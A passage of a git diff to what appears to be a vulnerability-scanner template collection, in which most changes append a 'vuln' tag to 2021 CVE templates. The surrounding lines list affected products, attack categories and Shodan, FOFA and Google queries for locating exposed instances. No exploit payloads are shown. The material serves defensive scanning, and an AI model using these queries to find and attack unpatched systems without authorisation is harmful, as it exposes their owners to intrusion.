vendor: hongdian product: h8922_firmware - tags: cve2021,cve,hongdian,rce,injection,vkev + tags: cve2021,cve,hongdian,rce,injection,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-28164.yaml b/http/cves/2021/CVE-2021-28164.yaml index c1244ed8ccf..2c38d0c2511 100644 --- a/http/cves/2021/CVE-2021-28164.yaml +++ b/http/cves/2021/CVE-2021-28164.yaml @@ -29,7 +29,7 @@ info: vendor: eclipse product: jetty shodan-query: cpe:"cpe:2.3:a:eclipse:jetty" - tags: cve2021,cve,packetstorm,vulhub,jetty,exposure,eclipse + tags: cve2021,cve,packetstorm,vulhub,jetty,exposure,eclipse,vuln flow: http(1) && http(2) http: diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml index de2019c5af3..539b33c2680 100644 --- a/http/cves/2021/CVE-2021-28169.yaml +++ b/http/cves/2021/CVE-2021-28169.yaml @@ -29,7 +29,7 @@ info: vendor: eclipse product: jetty shodan-query: cpe:"cpe:2.3:a:eclipse:jetty" - tags: cve2021,cve,jetty,eclipse,vkev + tags: cve2021,cve,jetty,eclipse,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml index 0d523e8be92..16d5817b164 100644 --- a/http/cves/2021/CVE-2021-28377.yaml +++ b/http/cves/2021/CVE-2021-28377.yaml @@ -26,7 +26,7 @@ info: vendor: chronoengine product: chronoforums framework: joomla - tags: cve2021,cve,chronoforums,lfi,joomla,chronoengine + tags: cve2021,cve,chronoforums,lfi,joomla,chronoengine,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-28854.yaml b/http/cves/2021/CVE-2021-28854.yaml index b9b0adc4df2..ef4db66cb0e 100644 --- a/http/cves/2021/CVE-2021-28854.yaml +++ b/http/cves/2021/CVE-2021-28854.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2021-28854 metadata: max-request: 1 - tags: cve2021,cve,sqli + tags: cve2021,cve,sqli,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-28918.yaml b/http/cves/2021/CVE-2021-28918.yaml index 77d9ca11534..576567ae6c0 100644 --- a/http/cves/2021/CVE-2021-28918.yaml +++ b/http/cves/2021/CVE-2021-28918.yaml @@ -28,7 +28,7 @@ info: vendor: netmask_project product: netmask framework: node.js - tags: cve2021,cve,npm,netmask,ssrf,lfi,netmask_project,node.js + tags: cve2021,cve,npm,netmask,ssrf,lfi,netmask_project,node.js,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml index f509e7977f0..365a964cf15 100644 --- a/http/cves/2021/CVE-2021-28937.yaml +++ b/http/cves/2021/CVE-2021-28937.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: acexy product: wireless-n_wifi_repeater - tags: cve2021,cve,acexy,disclosure,iot + tags: cve2021,cve,acexy,disclosure,iot,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-29006.yaml b/http/cves/2021/CVE-2021-29006.yaml index 476d3024228..9a7b5fb69b0 100644 --- a/http/cves/2021/CVE-2021-29006.yaml +++ b/http/cves/2021/CVE-2021-29006.yaml @@ -28,7 +28,7 @@ info: - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" - tags: cve2021,cve,rconfig,authenticated,lfi + tags: cve2021,cve,rconfig,authenticated,lfi,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml index c04aa816dd1..d715a5e526b 100644 --- a/http/cves/2021/CVE-2021-29156.yaml +++ b/http/cves/2021/CVE-2021-29156.yaml @@ -31,7 +31,7 @@ info: - http.title:"openam" fofa-query: title="openam" google-query: intitle:"openam" - tags: cve2021,cve,openam,ldap,injection,forgerock + tags: cve2021,cve,openam,ldap,injection,forgerock,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-29200.yaml b/http/cves/2021/CVE-2021-29200.yaml index 98f9784fe81..7d2983349b5 100644 --- a/http/cves/2021/CVE-2021-29200.yaml +++ b/http/cves/2021/CVE-2021-29200.yaml @@ -32,7 +32,7 @@ info: - app="Apache_OFBiz" - body="ofbiz" - app="apache_ofbiz" - tags: cve2021,cve,apache,ofbiz,deserialization,rce + tags: cve2021,cve,apache,ofbiz,deserialization,rce,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml index b0b83c3b128..46f9c9fa2dc 100644 --- a/http/cves/2021/CVE-2021-29203.yaml +++ b/http/cves/2021/CVE-2021-29203.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: hp product: edgeline_infrastructure_manager - tags: cve2021,cve,hpe,bypass,tenable,hp,vkev + tags: cve2021,cve,hpe,bypass,tenable,hp,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-29441.yaml b/http/cves/2021/CVE-2021-29441.yaml index 902b54ce895..f9a8e5a00c6 100644 --- a/http/cves/2021/CVE-2021-29441.yaml +++ b/http/cves/2021/CVE-2021-29441.yaml @@ -34,7 +34,7 @@ info: max-request: 2 vendor: alibaba product: nacos - tags: cve2021,cve,nacos,auth-bypass,alibaba,vkev + tags: cve2021,cve,nacos,auth-bypass,alibaba,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml index 1d88195cba4..b0f302bf42e 100644 --- a/http/cves/2021/CVE-2021-29442.yaml +++ b/http/cves/2021/CVE-2021-29442.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: alibaba product: nacos - tags: cve2021,cve,nacos,auth-bypass,alibaba,vkev + tags: cve2021,cve,nacos,auth-bypass,alibaba,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index cc1b9648ae4..1315eca68f2 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -30,7 +30,7 @@ info: product: ghost framework: node.js shodan-query: http.component:"ghost" - tags: cve2021,cve,xss,ghost,node.js + tags: cve2021,cve,xss,ghost,node.js,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-29490.yaml b/http/cves/2021/CVE-2021-29490.yaml index af42934c97a..e2b2f208c61 100644 --- a/http/cves/2021/CVE-2021-29490.yaml +++ b/http/cves/2021/CVE-2021-29490.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.title:"Jellyfin" fofa-query: body="jellyfin" google-query: intitle:"jellyfin" - tags: cve,cve2021,ssrf,jellyfin,oast + tags: cve,cve2021,ssrf,jellyfin,oast,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-29505.yaml b/http/cves/2021/CVE-2021-29505.yaml index 5894e34dbad..4b38f662b0e 100644 --- a/http/cves/2021/CVE-2021-29505.yaml +++ b/http/cves/2021/CVE-2021-29505.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: xstream_project product: xstream - tags: cve2021,cve,oast,vulhub,xstream,deserialization,rce,xstream_project + tags: cve2021,cve,oast,vulhub,xstream,deserialization,rce,xstream_project,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml index 2e87828391f..85347c551bb 100644 --- a/http/cves/2021/CVE-2021-29622.yaml +++ b/http/cves/2021/CVE-2021-29622.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: prometheus product: prometheus - tags: cve2021,cve,prometheus,redirect + tags: cve2021,cve,prometheus,redirect,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index 723e05f7a76..32f7565c18c 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -34,7 +34,7 @@ info: - title="login - adminer" google-query: intitle:"login - adminer" hunter-query: app.name="adminer"&&web.body="4.7.8" - tags: cve2021,cve,adminer,xss,sqli + tags: cve2021,cve,adminer,xss,sqli,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index 3681703a5fd..e2c3ecf7cb9 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: seopanel product: seo_panel - tags: cve2021,cve,seopanel,xss + tags: cve2021,cve,seopanel,xss,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml index 046adf977fc..68e8f9d72f3 100644 --- a/http/cves/2021/CVE-2021-30049.yaml +++ b/http/cves/2021/CVE-2021-30049.yaml @@ -28,7 +28,7 @@ info: product: sysaid shodan-query: http.favicon.hash:1540720428 fofa-query: icon_hash=1540720428 - tags: cve2021,cve,xss,sysaid + tags: cve2021,cve,xss,sysaid,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-30116.yaml b/http/cves/2021/CVE-2021-30116.yaml index 4e9328d20b3..e0cdf7646a9 100644 --- a/http/cves/2021/CVE-2021-30116.yaml +++ b/http/cves/2021/CVE-2021-30116.yaml @@ -27,7 +27,7 @@ info: vendor: kaseya product: virtual_system_administrator shodan-query: http.favicon.hash:-1445519482 - tags: cve,cve2021,kaseya,virtual_system_administrator,kev,vkev + tags: cve,cve2021,kaseya,virtual_system_administrator,kev,vkev,vuln flow: | http(1) diff --git a/http/cves/2021/CVE-2021-30118.yaml b/http/cves/2021/CVE-2021-30118.yaml index aa39d2a415a..7ac0da13282 100644 --- a/http/cves/2021/CVE-2021-30118.yaml +++ b/http/cves/2021/CVE-2021-30118.yaml @@ -30,7 +30,7 @@ info: vendor: kaseya product: vsa shodan-query: http.favicon.hash:-1445519482 - tags: cve,cve2021,kaseya,file-upload,vkev,intrusive,rce + tags: cve,cve2021,kaseya,file-upload,vkev,intrusive,rce,vuln variables: sessionid: "{{rand_int(11111111, 99999999)}}" diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml index c51a392ac15..2398c29f57f 100644 --- a/http/cves/2021/CVE-2021-30128.yaml +++ b/http/cves/2021/CVE-2021-30128.yaml @@ -35,7 +35,7 @@ info: - app="Apache_OFBiz" - body="ofbiz" - app="apache_ofbiz" - tags: cve2021,cve,apache,ofbiz,deserialization,rce + tags: cve2021,cve,apache,ofbiz,deserialization,rce,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-30134.yaml b/http/cves/2021/CVE-2021-30134.yaml index 85ee4805d2a..5d48f185610 100644 --- a/http/cves/2021/CVE-2021-30134.yaml +++ b/http/cves/2021/CVE-2021-30134.yaml @@ -28,7 +28,7 @@ info: vendor: php_curl_class_project product: php_curl_class google-query: inurl:"/php-curl-test/post_file_path_upload.php" - tags: cve2021,cve,xss,php-mod,wpscan,php_curl_class_project + tags: cve2021,cve,xss,php-mod,wpscan,php_curl_class_project,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index 3b74fc052c7..74879e280a0 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -32,7 +32,7 @@ info: - http.title:"sidekiq" fofa-query: title="sidekiq" google-query: intitle:"sidekiq" - tags: cve2021,cve,xss,sidekiq,authenticated,contribsys + tags: cve2021,cve,xss,sidekiq,authenticated,contribsys,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-3017.yaml b/http/cves/2021/CVE-2021-3017.yaml index 9c759604b63..5b9ed1590a2 100644 --- a/http/cves/2021/CVE-2021-3017.yaml +++ b/http/cves/2021/CVE-2021-3017.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: intelbras product: win_300 - tags: cve2021,cve,exposure,router,intelbras + tags: cve2021,cve,exposure,router,intelbras,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml index 94bfb0d6e7d..0b1f2334f6a 100644 --- a/http/cves/2021/CVE-2021-30175.yaml +++ b/http/cves/2021/CVE-2021-30175.yaml @@ -28,7 +28,7 @@ info: vendor: zerof product: web_server shodan-query: cpe:"cpe:2.3:a:google:web_server" - tags: cve2021,cve,zerof,sqli + tags: cve2021,cve,zerof,sqli,vuln flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-3018.yaml b/http/cves/2021/CVE-2021-3018.yaml index fff830d69ba..fa39eaba54b 100644 --- a/http/cves/2021/CVE-2021-3018.yaml +++ b/http/cves/2021/CVE-2021-3018.yaml @@ -28,7 +28,7 @@ info: vendor: ipeak product: ipeakcms fofa-query: body="ipeak" && body="3.5" - tags: cve,cve2021,ipeakcms,cms,sqli,unauth,vkev + tags: cve,cve2021,ipeakcms,cms,sqli,unauth,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml index 6e227691bb5..5947ab77ffb 100644 --- a/http/cves/2021/CVE-2021-3019.yaml +++ b/http/cves/2021/CVE-2021-3019.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: lanproxy_project product: lanproxy - tags: cve2021,cve,lanproxy,lfi,lanproxy_project + tags: cve2021,cve,lanproxy,lfi,lanproxy_project,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-30203.yaml b/http/cves/2021/CVE-2021-30203.yaml index b4aa8078c91..262681fabf1 100644 --- a/http/cves/2021/CVE-2021-30203.yaml +++ b/http/cves/2021/CVE-2021-30203.yaml @@ -23,7 +23,7 @@ info: shodan-query: http.html:"dzzoffice" product: dzzoffice vendor: dzzoffice - tags: cve,cve2021,dzzoffice,xss + tags: cve,cve2021,dzzoffice,xss,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-30213.yaml b/http/cves/2021/CVE-2021-30213.yaml index 146e6800c09..43a4ab2fd18 100644 --- a/http/cves/2021/CVE-2021-30213.yaml +++ b/http/cves/2021/CVE-2021-30213.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: eng product: knowage - tags: cve2021,cve,xss,knowage,eng + tags: cve2021,cve,xss,knowage,eng,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml index abfcb4417ac..e1fed3a8ee6 100644 --- a/http/cves/2021/CVE-2021-30461.yaml +++ b/http/cves/2021/CVE-2021-30461.yaml @@ -33,7 +33,7 @@ info: - http.title:"voipmonitor" fofa-query: title="voipmonitor" google-query: intitle:"voipmonitor" - tags: cve2021,cve,rce,voipmonitor,vkev + tags: cve2021,cve,rce,voipmonitor,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml index c7858ae0a53..00a175c9e6f 100644 --- a/http/cves/2021/CVE-2021-30497.yaml +++ b/http/cves/2021/CVE-2021-30497.yaml @@ -28,7 +28,7 @@ info: vendor: ivanti product: avalanche framework: windows - tags: cve2021,cve,avalanche,traversal,lfi,ivanti,windows,vkev + tags: cve2021,cve,avalanche,traversal,lfi,ivanti,windows,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml index 7350ac70840..0d29b84fb1f 100644 --- a/http/cves/2021/CVE-2021-3110.yaml +++ b/http/cves/2021/CVE-2021-3110.yaml @@ -29,7 +29,7 @@ info: vendor: prestashop product: prestashop shodan-query: cpe:"cpe:2.3:a:prestashop:prestashop" - tags: time-based-sqli,cve,cve2021,sqli,prestshop,edb,prestashop + tags: time-based-sqli,cve,cve2021,sqli,prestshop,edb,prestashop,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml index 1954b1aff96..71877f6d9d6 100644 --- a/http/cves/2021/CVE-2021-31195.yaml +++ b/http/cves/2021/CVE-2021-31195.yaml @@ -36,7 +36,7 @@ info: - title="outlook" - icon_hash=1768726119 google-query: intitle:"outlook" - tags: cve2021,cve,microsoft,exchange,owa,xss + tags: cve2021,cve,microsoft,exchange,owa,xss,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-31249.yaml b/http/cves/2021/CVE-2021-31249.yaml index dddf82b76d5..e56f8e29473 100644 --- a/http/cves/2021/CVE-2021-31249.yaml +++ b/http/cves/2021/CVE-2021-31249.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: chiyu-tech product: bf-430_firmware - tags: cve2021,cve,chiyu,crlf,iot,chiyu-tech + tags: cve2021,cve,chiyu,crlf,iot,chiyu-tech,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-31250.yaml b/http/cves/2021/CVE-2021-31250.yaml index 9f6060ef65a..f12615a6d2a 100644 --- a/http/cves/2021/CVE-2021-31250.yaml +++ b/http/cves/2021/CVE-2021-31250.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: chiyu-tech product: bf-430_firmware - tags: cve2021,cve,chiyu,xss,iot,intrusive,chiyu-tech,vkev + tags: cve2021,cve,chiyu,xss,iot,intrusive,chiyu-tech,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-3129.yaml b/http/cves/2021/CVE-2021-3129.yaml index ea91c1c2d49..ee0fdebd4a8 100644 --- a/http/cves/2021/CVE-2021-3129.yaml +++ b/http/cves/2021/CVE-2021-3129.yaml @@ -27,7 +27,7 @@ info: vendor: facade product: ignition framework: laravel - tags: cve2021,cve,laravel,rce,vulhub,kev,facade,vkev + tags: cve2021,cve,laravel,rce,vulhub,kev,facade,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-31316.yaml b/http/cves/2021/CVE-2021-31316.yaml index 821d9a94709..da6f2bf9825 100644 --- a/http/cves/2021/CVE-2021-31316.yaml +++ b/http/cves/2021/CVE-2021-31316.yaml @@ -22,7 +22,7 @@ info: product: webpanel shodan-query: title:"Login | Control WebPanel" fofa-query: title="Login | Control WebPanel" - tags: cve,cve2021,centos,cwpsrv,sqli + tags: cve,cve2021,centos,cwpsrv,sqli,vuln flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-31324.yaml b/http/cves/2021/CVE-2021-31324.yaml index f24c848e4a8..2b8f7b13650 100644 --- a/http/cves/2021/CVE-2021-31324.yaml +++ b/http/cves/2021/CVE-2021-31324.yaml @@ -22,7 +22,7 @@ info: product: webpanel shodan-query: title:"Login | Control WebPanel" fofa-query: title="Login | Control WebPanel" - tags: cve,cve2021,centos,cwpsrv,os,rce + tags: cve,cve2021,centos,cwpsrv,os,rce,vuln flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-31537.yaml b/http/cves/2021/CVE-2021-31537.yaml index 6fb40a339ae..c2f31b26142 100644 --- a/http/cves/2021/CVE-2021-31537.yaml +++ b/http/cves/2021/CVE-2021-31537.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: sisinformatik product: sis-rewe_go - tags: cve2021,cve,xss,seclists,intrusive,sisinformatik + tags: cve2021,cve,xss,seclists,intrusive,sisinformatik,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-31581.yaml b/http/cves/2021/CVE-2021-31581.yaml index ce5a498c1e7..01a24f20db9 100644 --- a/http/cves/2021/CVE-2021-31581.yaml +++ b/http/cves/2021/CVE-2021-31581.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: akkadianlabs product: ova_appliance - tags: cve,cve2021,akkadian,mariadb,disclosure,akkadianlabs + tags: cve,cve2021,akkadian,mariadb,disclosure,akkadianlabs,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index bc4c049927b..4e80436b42c 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -31,7 +31,7 @@ info: google-query: - '"BeyondTrust" "Redistribution Prohibited"' - '"beyondtrust" "redistribution prohibited"' - tags: cve,cve2021,xss,packetstorm,beyondtrust,bomgar,vkev + tags: cve,cve2021,xss,packetstorm,beyondtrust,bomgar,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml index f4838720217..afb2d30d404 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -30,7 +30,7 @@ info: shodan-query: - Pentaho - pentaho - tags: cve2021,cve,spring,seclists,pentaho,auth-bypass,hitachi,vkev + tags: cve2021,cve,spring,seclists,pentaho,auth-bypass,hitachi,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index bf15ca565f9..6de912c1144 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -31,7 +31,7 @@ info: - html:"/_common/lvl5/dologin.jsp" - http.html:"/_common/lvl5/dologin.jsp" fofa-query: body="/_common/lvl5/dologin.jsp" - tags: cve2021,cve,webctrl,xss,packetstorm,automatedlogic + tags: cve2021,cve,webctrl,xss,packetstorm,automatedlogic,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-31755.yaml b/http/cves/2021/CVE-2021-31755.yaml index cd197fd2c22..0f85b8886cd 100644 --- a/http/cves/2021/CVE-2021-31755.yaml +++ b/http/cves/2021/CVE-2021-31755.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: tenda product: ac11_firmware - tags: cve2021,cve,tenda,rce,oast,router,mirai,kev,vkev + tags: cve2021,cve,tenda,rce,oast,router,mirai,kev,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index 8d89df41dc2..68720b89edb 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml @@ -35,7 +35,7 @@ info: - title="struts2 showcase" - body="apache struts" google-query: intitle:"struts2 showcase" - tags: cve2021,cve,apache,rce,struts,struts2,intrusive,vkev + tags: cve2021,cve,apache,rce,struts,struts2,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-31856.yaml b/http/cves/2021/CVE-2021-31856.yaml index e1e670c3451..161b2218332 100644 --- a/http/cves/2021/CVE-2021-31856.yaml +++ b/http/cves/2021/CVE-2021-31856.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: layer5 product: meshery - tags: cve2021,cve,sqli,layer5 + tags: cve2021,cve,sqli,layer5,vuln variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml index 753894e41bb..804b73a7ff4 100644 --- a/http/cves/2021/CVE-2021-31862.yaml +++ b/http/cves/2021/CVE-2021-31862.yaml @@ -29,7 +29,7 @@ info: product: sysaid shodan-query: http.favicon.hash:1540720428 fofa-query: icon_hash=1540720428 - tags: cve2021,cve,xss,sysaid + tags: cve2021,cve,xss,sysaid,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-32030.yaml b/http/cves/2021/CVE-2021-32030.yaml index aef9c1440e6..9d77ec45e08 100644 --- a/http/cves/2021/CVE-2021-32030.yaml +++ b/http/cves/2021/CVE-2021-32030.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: asus product: gt-ac2900_firmware - tags: cve2021,cve,asus,auth-bypass,router,kev,vkev + tags: cve2021,cve,asus,auth-bypass,router,kev,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-32172.yaml b/http/cves/2021/CVE-2021-32172.yaml index 89a602ae66d..c7cc9eb8790 100644 --- a/http/cves/2021/CVE-2021-32172.yaml +++ b/http/cves/2021/CVE-2021-32172.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: maianscriptworld product: maian_cart - tags: cve2021,cve,rce,unauth,maian,intrusive,maianscriptworld,vkev + tags: cve2021,cve,rce,unauth,maian,intrusive,maianscriptworld,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml index 5b1649609f0..63933a29bce 100644 --- a/http/cves/2021/CVE-2021-3223.yaml +++ b/http/cves/2021/CVE-2021-3223.yaml @@ -36,7 +36,7 @@ info: - title="Node-RED" - title="node-red" google-query: intitle:"node-red" - tags: cve,cve2021,node-red-dashboard,lfi,nodered,node.js,vkev + tags: cve,cve2021,node-red-dashboard,lfi,nodered,node.js,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-32305.yaml b/http/cves/2021/CVE-2021-32305.yaml index bbfe2f56fcd..9b992ba7cf4 100644 --- a/http/cves/2021/CVE-2021-32305.yaml +++ b/http/cves/2021/CVE-2021-32305.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: websvn product: websvn - tags: cve,cve2021,websvn,rce,oast,packetstorm,vkev + tags: cve,cve2021,websvn,rce,oast,packetstorm,vkev,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-32478.yaml b/http/cves/2021/CVE-2021-32478.yaml index b79ed9c0f4a..f1ab10e45fc 100644 --- a/http/cves/2021/CVE-2021-32478.yaml +++ b/http/cves/2021/CVE-2021-32478.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: moodle product: moodle - tags: cve,cve2021,moodle,xss,intrusive + tags: cve,cve2021,moodle,xss,intrusive,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-32618.yaml b/http/cves/2021/CVE-2021-32618.yaml index 442144eecdc..423e494823f 100644 --- a/http/cves/2021/CVE-2021-32618.yaml +++ b/http/cves/2021/CVE-2021-32618.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: flask-security_project product: flask-security - tags: cve2021,cve,redirect,flask,flask-security_project + tags: cve2021,cve,redirect,flask,flask-security_project,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-32648.yaml b/http/cves/2021/CVE-2021-32648.yaml index a4a4bde933f..91e827eda2d 100644 --- a/http/cves/2021/CVE-2021-32648.yaml +++ b/http/cves/2021/CVE-2021-32648.yaml @@ -24,7 +24,7 @@ info: vendor: octobercms product: october shodan-query: http.component:"october cms" - tags: cve,cve2021,cms,octobercms,intrusive,kev,vkev + tags: cve,cve2021,cms,octobercms,intrusive,kev,vkev,vuln variables: reset_token: "{{rand_base(42)}}" diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml index c4e6f960ccc..93f5a91bf9f 100644 --- a/http/cves/2021/CVE-2021-32682.yaml +++ b/http/cves/2021/CVE-2021-32682.yaml @@ -27,7 +27,7 @@ info: vendor: std42 product: elfinder github: https://github.com/Studio-42/elFinder - tags: cve2021,cve,elfinder,misconfig,rce,oss,std42 + tags: cve2021,cve,elfinder,misconfig,rce,oss,std42,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-32789.yaml b/http/cves/2021/CVE-2021-32789.yaml index e2cb0d23c4f..789e16a8ce6 100644 --- a/http/cves/2021/CVE-2021-32789.yaml +++ b/http/cves/2021/CVE-2021-32789.yaml @@ -29,7 +29,7 @@ info: vendor: automattic product: woocommerce_blocks framework: wordpress - tags: cve2021,cve,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan,automattic,vkev + tags: cve2021,cve,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan,automattic,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml index 93210e17212..d1339bcd871 100644 --- a/http/cves/2021/CVE-2021-32819.yaml +++ b/http/cves/2021/CVE-2021-32819.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: squirrelly product: squirrelly - tags: cve2021,cve,nodejs,rce,oast,squirrelly,vkev + tags: cve2021,cve,nodejs,rce,oast,squirrelly,vkev,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-32820.yaml b/http/cves/2021/CVE-2021-32820.yaml index 5ba26feab42..4273a63ccff 100644 --- a/http/cves/2021/CVE-2021-32820.yaml +++ b/http/cves/2021/CVE-2021-32820.yaml @@ -28,7 +28,7 @@ info: vendor: express_handlebars_project product: express_handlebars framework: node.js - tags: cve2021,cve,expressjs,lfi,xxe,express_handlebars_project,node.js + tags: cve2021,cve,expressjs,lfi,xxe,express_handlebars_project,node.js,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-32853.yaml b/http/cves/2021/CVE-2021-32853.yaml index e5963fe8474..a143404a291 100644 --- a/http/cves/2021/CVE-2021-32853.yaml +++ b/http/cves/2021/CVE-2021-32853.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.title:"erxes" fofa-query: title="erxes" google-query: intitle:"erxes" - tags: cve2021,cve,xss,erxes,oss + tags: cve2021,cve,xss,erxes,oss,vuln http: - method: GET diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml index 100fc48c88d..fd2c4ec2537 100644 --- a/http/cves/2021/CVE-2021-3293.yaml +++ b/http/cves/2021/CVE-2021-3293.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: emlog product: emlog - tags: cve2021,cve,emlog,fpd + tags: cve2021,cve,emlog,fpd,vuln http: - raw: diff --git a/http/cves/2021/CVE-2021-3297.yaml b/http/cves/2021/CVE-2021-3297.yaml index cdd83403388..e4bc017c1cf 100644 --- a/http/cves/2021/CVE-2021-3297.yaml +++ b/http/cves/2021/CVE-2021-3297.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: zyxel product: nbg2105_firmware - tags: cve,cve2021,zyxel,auth-bypass,router,vkev + tags: 